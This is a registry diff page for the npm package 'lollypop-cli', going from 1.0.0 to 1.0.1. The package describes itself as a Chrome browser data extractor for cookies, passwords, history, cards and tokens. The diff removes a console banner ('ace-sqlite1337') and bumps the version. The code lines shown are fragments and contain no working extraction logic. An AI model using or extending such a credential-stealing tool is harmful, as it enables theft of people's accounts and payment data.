lollypop-cli 1.0.0 → 1.0.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/index.js +0 -1
  2. package/package.json +1 -1
package/index.js CHANGED
@@ -297,7 +297,6 @@ function extractTokens(profilePath, outputDir, keyHex) {
297
297
  // ─── Main export ─────────────────────────────────────────────────────────────
298
298
 
299
299
  function main(config = {}) {
300
- console.log('=== ace-sqlite1337 ===\n');
301
300
 
302
301
  const browserList = config.browsers
303
302
  ? Object.entries(config.browsers).map(([key, val]) => ({ key, name: val.name || key, dir: val.path }))
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "lollypop-cli",
3
- "version": "1.0.0",
3
+ "version": "1.0.1",
4
4
  "description": "Chrome ABE browser data extractor (cookies, passwords, history, cards, tokens)",
5
5
  "main": "index.js",
6
6
  "files": [